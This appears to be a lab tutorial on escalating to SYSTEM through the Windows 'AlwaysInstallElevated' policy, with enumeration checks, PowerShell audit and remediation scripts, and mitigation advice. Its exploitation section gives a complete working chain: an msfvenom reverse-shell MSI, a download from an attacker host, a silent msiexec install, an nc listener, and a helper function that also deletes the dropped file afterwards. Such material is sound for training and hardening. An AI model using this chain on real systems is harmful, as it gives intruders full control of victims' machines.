Leveraging “AlwaysInstallElevated” for Windows Privilege Escalation

The “AlwaysInstallElevated” setting in Windows is a misconfiguration that allows low-privileged users to escalate privileges to SYSTEM by installing MSI packages. Administrators sometimes enable it for convenience and never turn it off, which makes it a common privilege escalation vector for attackers.

What is AlwaysInstallElevated?

AlwaysInstallElevated is a Windows policy setting that allows standard users to run Windows Installer (.msi) packages with elevated privileges. This setting is intended for enterprise environments where administrators want to allow software installations without requiring administrative credentials.

However, if the AlwaysInstallElevated value is set to 1 under both the HKLM (Local Machine) and HKCU (Current User) policy keys, the Windows Installer service performs every installation with SYSTEM privileges, so any code a package runs during installation (for example a custom action) also runs as SYSTEM. Windows only honours the policy when both values are set; one on its own has no effect. Attackers exploit this by crafting a malicious MSI package and installing it as a low-privileged user.

A common scenario where this misconfiguration is inadvertently left enabled is when system administrators set up automated software installations in a corporate environment with the “AlwaysInstallElevated” setting. However, after deployment, they may forget to revert the setting, which leaves the system vulnerable.

Lab Setup

To demonstrate the Proof of Concept (PoC), we misconfigured our lab to have the “AlwaysInstallElevated” setting enabled:

  1. Target Machine: Windows 10 Enterprise (10.0.2.40)
  2. Attacker Machine: Kali Linux (10.0.2.29)

Configuration

On the Windows machine, follow these steps to enable the AlwaysInstallElevated setting using the Group Policy Editor:

  1. Press Win + R, type gpedit.msc, and press Enter to open the Local Group Policy Editor.
  2. Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Installer.
  3. Locate the policy named Always install with elevated privileges. Double-click the policy, select Enabled, and click OK.
  4. Repeat step 3 under User Configuration > Administrative Templates > Windows Components > Windows Installer.
  5. Once both policies are enabled, apply the changes by running the following command in an elevated command prompt:

gpupdate /force

Privilege Escalation – Enumeration

This PoC assumes an initial foothold has been gained on the target, as a low-level user. Therefore, we will demonstrate how to exploit this misconfiguration to escalate our privilege to “SYSTEM”.

First, check whether the “AlwaysInstallElevated” setting is enabled on the target by running the following commands in cmd or PowerShell:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both queries return 0x1, the system is vulnerable. If either query fails with “The system was unable to find the specified registry key or value”, or returns 0x0, the policy is not in effect and this technique will not work.
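The same check as a single PowerShell function, added here as an example (it is not part of the original post). It reads both policy keys, treats a missing key or value as 0 rather than as an error, and only reports the host as vulnerable when both values are 1:

```powershell
# Added example, not from the original post: check both AlwaysInstallElevated
# policy values at once. Works as a low-privileged user (both keys are readable).
function Test-AlwaysInstallElevated {
    $keys = @{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $result = [ordered]@{}
    foreach ($hive in 'HKLM', 'HKCU') {
        # -ErrorAction SilentlyContinue: on a healthy host the key or value is
        # normally absent, which reg query reports as an error. Treat absent as 0.
        $item = Get-ItemProperty -Path $keys[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $result[$hive] = if ($null -ne $item) { [int]$item.AlwaysInstallElevated } else { 0 }
    }
    # Windows Installer only honours the policy when BOTH values are 1.
    $result['Vulnerable'] = ($result['HKLM'] -eq 1) -and ($result['HKCU'] -eq 1)
    [pscustomobject]$result
}

# Usage: prints HKLM, HKCU and Vulnerable in one row.
Test-AlwaysInstallElevated
```

A host where only one of the two values is 1 shows Vulnerable = False; that matches how the Windows Installer service evaluates the policy, so there is no point generating a payload in that case.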

Privilege Escalation – WinPEAS

We can also use an automated enumeration tool such as WinPEAS, a privilege escalation auditing script that looks for weaknesses in Windows systems that could provide a path to elevated privileges.

The script will automatically enumerate the misconfiguration once executed on the target.

After downloading the script on our attacker machine, transfer it to the target. Before executing it there, run the following command on the target so the output is coloured (it enables ANSI escape sequence processing in the console):

REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Execute the script on the target.

The output shows the “AlwaysInstallElevated” value set to 1 in both HKLM and HKCU, which means the system is vulnerable.

Privilege Escalation – Manual Exploitation

To exploit this misconfiguration, generate a malicious installer package (.msi) on the attacker machine with msfvenom, then serve it from a local web server on the attacker machine so the target can download it.

The malicious package installer file (.msi) will launch a reverse shell back to our attacker machine, as the “SYSTEM” user.

To generate the .msi file with msfvenom, run the following command:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=443 -a x64 --platform windows -f msi -o shell.msi

To serve the file from the attacker machine, run:

python3 -m http.server 80

To download and install the .msi on the target, run the following commands in PowerShell (wget is an alias for Invoke-WebRequest there; it does not exist in cmd):

wget http://<attacker_ip>/shell.msi -OutFile shell.msi

msiexec /quiet /qn /i shell.msi

Make sure a listener on the same port used when generating the .msi (443) is running on the attacker machine before executing the msiexec command:

nc -nvlp 443

Once the .msi is installed we are dropped into a reverse shell as “NT AUTHORITY\SYSTEM”, which means the target machine is fully compromised.
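The download-and-install steps above wrapped into one target-side PowerShell function, added here as an example (it is not part of the original post). The URL, file name and port follow the msfvenom and http.server commands above and are assumptions; the nc listener must already be running on the attacker machine:

```powershell
# Added example, not from the original post: fetch the .msi served by the
# attacker and hand it to the Windows Installer service as a low-privileged user.
function Invoke-ElevatedMsi {
    param(
        [Parameter(Mandatory)] [string] $Url,                        # e.g. http://<attacker_ip>/shell.msi
        [string] $Path = (Join-Path $env:TEMP 'shell.msi')           # writable by any user
    )
    # wget/curl are aliases of Invoke-WebRequest in Windows PowerShell; -OutFile is
    # the full parameter name, so there is no ambiguity with other -O* parameters.
    Invoke-WebRequest -Uri $Url -OutFile $Path -UseBasicParsing

    # /i install, /qn no UI. With both policy values set to 1 the Windows Installer
    # service runs the package as SYSTEM, so the payload inherits SYSTEM.
    $proc = Start-Process -FilePath 'msiexec.exe' -ArgumentList "/i `"$Path`" /qn" -Wait -PassThru

    # The shell is spawned from the service side, so the client msiexec returns here.
    # A msfvenom MSI typically reports a failure (often 1603) after the payload has
    # already run; the exit code is therefore informational only.
    Remove-Item -Path $Path -ErrorAction SilentlyContinue              # remove the dropped file
    return $proc.ExitCode
}

# Usage (assumed URL): start "nc -nvlp 443" on the attacker first, then:
Invoke-ElevatedMsi -Url 'http://<attacker_ip>/shell.msi'
```

Dropping the file under %TEMP% rather than the current directory avoids failures when the foothold shell sits in a directory the user cannot write to, and removing it afterwards keeps the artefact off disk once the shell is established.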

Mitigation

To mitigate this misconfiguration, disable the “AlwaysInstallElevated” setting:

  1. Open Local Group Policy Editor (gpedit.msc) and disable the Always install with elevated privileges setting under both Computer Configuration and User Configuration.
  2. Alternatively, delete the values from an elevated command prompt or PowerShell session. Note that this only helps if no local or domain Group Policy re-applies them on the next policy refresh (gpupdate); if a policy object sets them, fix the policy itself:

reg delete HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f

reg delete HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f

  • Ensure that users do not have unnecessary administrative privileges.
  • Regularly audit system configurations for security misconfigurations, including the HKCU hives of other users on shared machines, since the HKCU check above only covers the account that runs it.
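An audit-and-remediate script for the mitigation steps above, added here as an example (it is not part of the original post). Unlike the reg delete commands, it checks every loaded user hive under HKEY_USERS rather than only HKCU, and writes the value 0 (what the Group Policy “Disabled” state writes) wherever it finds 1. It must be run from an elevated PowerShell session, and it cannot stop a local or domain GPO from re-applying the value, so the policy source still has to be fixed:

```powershell
# Added example, not from the original post: find every hive where
# AlwaysInstallElevated is 1 (HKLM plus all loaded user hives) and set it to 0.
function Disable-AlwaysInstallElevated {
    $sub  = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $keys = @("HKLM:\$sub")

    # Each loaded user profile appears under HKEY_USERS by SID; skip the *_Classes hives.
    $sids = Get-ChildItem -Path 'Registry::HKEY_USERS' |
            Where-Object { $_.PSChildName -notlike '*_Classes' }
    foreach ($s in $sids) {
        $keys += "Registry::HKEY_USERS\$($s.PSChildName)\$sub"
    }

    $fixed = @()
    foreach ($key in $keys) {
        $v = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        if ($v -eq 1) {
            # 0 is the "Disabled" policy state; Windows Installer then runs installs
            # with the invoking user's privileges again.
            Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
            $fixed += $key
        }
    }
    return $fixed   # keys that were 1 and have now been set to 0
}

# Usage: lists every key that was corrected (empty output means nothing was set).
Disable-AlwaysInstallElevated
# Then run "gpupdate /force" and repeat the reg query commands above: if a value
# comes back as 0x1, a local or domain policy is re-applying it and must be changed.
```

Re-checking after gpupdate is the important part: a value that reappears tells you the registry edit was only treating the symptom, and the “Always install with elevated privileges” policy itself is still Enabled somewhere.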

Conclusion

The “AlwaysInstallElevated” misconfiguration is a simple yet effective privilege escalation technique. By exploiting improperly configured systems, attackers can gain SYSTEM privileges with ease, once an initial foothold is gained.

If the “AlwaysInstallElevated” setting must be used in a corporate environment, system administrators should ensure that the setting is disabled after deploying the necessary software.

By Emmanuel Akobe-Ajibolu
